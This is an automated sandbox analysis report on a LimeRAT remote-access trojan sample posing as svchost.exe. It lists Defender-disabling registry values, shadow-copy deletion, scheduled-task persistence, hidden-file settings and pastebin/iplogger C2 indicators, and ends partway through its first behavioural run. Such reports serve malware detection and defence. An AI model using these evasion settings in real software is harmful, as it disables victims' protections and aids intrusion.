Malware Analysis Report

2024-09-11 09:57

Sample ID 240619-1x3s8atela
Target svchost.exe
SHA256 cb87011623c7e41c0a449814e76c887543e6e39e6ab3864c7cc3636dcf09e196
Tags
limerat defense_evasion evasion execution impact ransomware rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

cb87011623c7e41c0a449814e76c887543e6e39e6ab3864c7cc3636dcf09e196

Threat Level: Known bad

The file svchost.exe was found to be: Known bad.

Malicious Activity Summary

limerat defense_evasion evasion execution impact ransomware rat trojan

Modifies visibility of hidden/system files in Explorer

Limerat family

Contains code to disable Windows Defender

Modifies security service

LimeRAT

Modifies Windows Defender Real-time Protection settings

Modifies visibility of file extensions in Explorer

Deletes shadow copies

Executes dropped EXE

Checks computer location settings

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Hide Artifacts: Hidden Files and Directories

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

System policy modification

Suspicious behavior: EnumeratesProcesses

Scheduled Task/Job: Scheduled Task

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

Disables Windows logging functionality

Interacts with shadow copies

Checks processor information in registry

Views/modifies file attributes

Suspicious use of FindShellTrayWindow

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-19 22:02

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Limerat family

limerat

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-19 22:02

Reported

2024-06-19 22:06

Platform

win10-20240404-en

Max time kernel

194s

Max time network

196s

Command Line

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

LimeRAT

rat limerat

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Modifies visibility of file extensions in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Modifies visibility of hidden/system files in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\4183903823\2290032291.pri C:\Windows\system32\taskmgr.exe N/A
File created C:\Windows\rescache\_merged\1601268389\715946058.pri C:\Windows\system32\taskmgr.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\taskmgr.exe N/A

Disables Windows logging functionality

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2324 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SYSTEM32\cmd.exe
PID 4228 wrote to memory of 3852 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 4228 wrote to memory of 3852 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 4228 wrote to memory of 4672 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 4228 wrote to memory of 4672 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 2324 wrote to memory of 5016 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 5016 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 3156 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 3156 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
